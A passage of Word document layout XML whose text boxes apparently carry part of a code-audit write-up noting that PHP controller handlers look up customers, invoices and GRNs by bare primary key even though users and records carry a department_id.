                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>id</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="25472" name="Rectangle 25472"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1125425" y="271987"/>
                            <a:ext cx="77521" cy="140102"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="082E2AA9" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>}</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="861" name="Rectangle 861"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1210717" y="266700"/>
                            <a:ext cx="2807474" cy="148361"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6E275887" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> handler was a bare primary-key lookup:</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="862" name="Rectangle 862"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="660530"/>
                            <a:ext cx="4998119" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="767C29A7" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">CustomerController.php:101   </w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>Customer::</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>with('department')-&gt;find($id);</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="863" name="Rectangle 863"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="831980"/>
                            <a:ext cx="4418627" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1456DA31" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">InvoiceController.php:229    </w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>Invoice::</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>with([...])-&gt;find($id);</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="864" name="Rectangle 864"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="1003430"/>
                            <a:ext cx="4128881" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="62FD3A47" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">GrnController.php:207        </w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>Grn</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with([...])-&gt;find($id);</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="865" name="Rectangle 865"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1371600"/>
                            <a:ext cx="982300" cy="148361"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="27B1A3A4" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Users carry a </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="866" name="Shape 866"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="742950" y="1353229"/>
                            <a:ext cx="809625" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="809625" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="800100" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="802730" y="0"/>
                                  <a:pt x="804975" y="930"/>
                                  <a:pt x="806835" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="808695" y="4645"/>
                                  <a:pt x="809625" y="6893"/>
                                  <a:pt x="809625" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="809625" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="809625" y="135976"/>
                                  <a:pt x="808695" y="138224"/>
                                  <a:pt x="806835" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="804975" y="141939"/>
                                  <a:pt x="802730" y="142869"/>
                                  <a:pt x="800100" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142869"/>
                                  <a:pt x="4650" y="141939"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="135976"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6893"/>
                                  <a:pt x="930" y="4645"/>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67" name="Rectangle 867"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="765572" y="1376887"/>
                            <a:ext cx="1007775" cy="140101"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="64DF88FE" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>department_id</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="868" name="Rectangle 868"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1550342" y="1371600"/>
                            <a:ext cx="96419" cy="148361"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6E975DE0" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> (</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="869" name="Shape 869"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1619250" y="1353229"/>
                            <a:ext cx="695325" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="695325" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="685800" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="688430" y="0"/>
                                  <a:pt x="690675" y="930"/>
                                  <a:pt x="692535" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="694395" y="4645"/>
                                  <a:pt x="695325" y="6893"/>
                                  <a:pt x="695325" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="695325" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="695325" y="135976"/>
                                  <a:pt x="694395" y="138224"/>
                                  <a:pt x="692535" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="690675" y="141939"/>
                                  <a:pt x="688430" y="142869"/>
                                  <a:pt x="685800" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142869"/>
                                  <a:pt x="4650" y="141939"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="135976"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6893"/>
                                  <a:pt x="930" y="4645"/>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70" name="Rectangle 870"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1649908" y="1376887"/>
                            <a:ext cx="852732" cy="140101"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3FF93FE7" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>User.php:24</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="25477" name="Rectangle 25477"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3571604" y="1371599"/>
                            <a:ext cx="52564" cy="148366"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="58155F8D" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t>(</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="25475" name="Rectangle 25475"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2318147" y="1371599"/>
                            <a:ext cx="52564" cy="148366"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="46FF8DDF" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t>)</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="25478" name="Rectangle 25478"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2357669" y="1371599"/>
                            <a:ext cx="1614534" cy="148366"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="54F28232" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> and so do the records </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="872" name="Shape 872"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3609975" y="1353229"/>
                            <a:ext cx="866775" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="866775" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="857250" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="859880" y="0"/>
                                  <a:pt x="862125" y="930"/>
                                  <a:pt x="863985" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="865845" y="4645"/>
                                  <a:pt x="866775" y="6893"/>
                                  <a:pt x="866775" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="866775" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="866775" y="135976"/>
                                  <a:pt x="865845" y="138224"/>
                                  <a:pt x="863985" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="862125" y="141939"/>
                                  <a:pt x="859880" y="142869"/>
                                  <a:pt x="857250" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142869"/>
                                  <a:pt x="4650" y="141939"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="135976"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6893"/>
                                  <a:pt x="930" y="4645"/>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73" name="Rectangle 873"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3638103" y="1376887"/>
                            <a:ext cx="1085296" cy="140101"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="76799E5D" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>Invoice.php:16</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="874" name="Rectangle 874"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4481066" y="1371600"/>
                            <a:ext cx="87710" cy="148361"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="32BD4CB3" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">, </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="875" name="Shape 875"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4543424" y="1353229"/>
                            <a:ext cx="638175" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="638175" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="628650" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="631280" y="0"/>
                                  <a:pt x="633526" y="930"/>
                                  <a:pt x="635385" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="637245" y="4645"/>
                                  <a:pt x="638175" y="6893"/>
                                  <a:pt x="638175" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="638175" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="638175" y="135976"/>
                                  <a:pt x="637245" y="138224"/>
                                  <a:pt x="635385" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="633526" y="141939"/>
                                  <a:pt x="631280" y="142869"/>
                                  <a:pt x="628650" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142869"/>
                                  <a:pt x="4650" y="141939"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="135976"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6893"/>
                                  <a:pt x="930" y="4645"/>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76" name="Rectangle 876"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4574083" y="1376887"/>
                            <a:ext cx="775211" cy="140101"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="23342CB2" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>Grn.php:15</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="25480" name="Rectangle 25480"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5183981" y="1371599"/>
                            <a:ext cx="52564" cy="148366"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="23A36EF3" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t>)</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
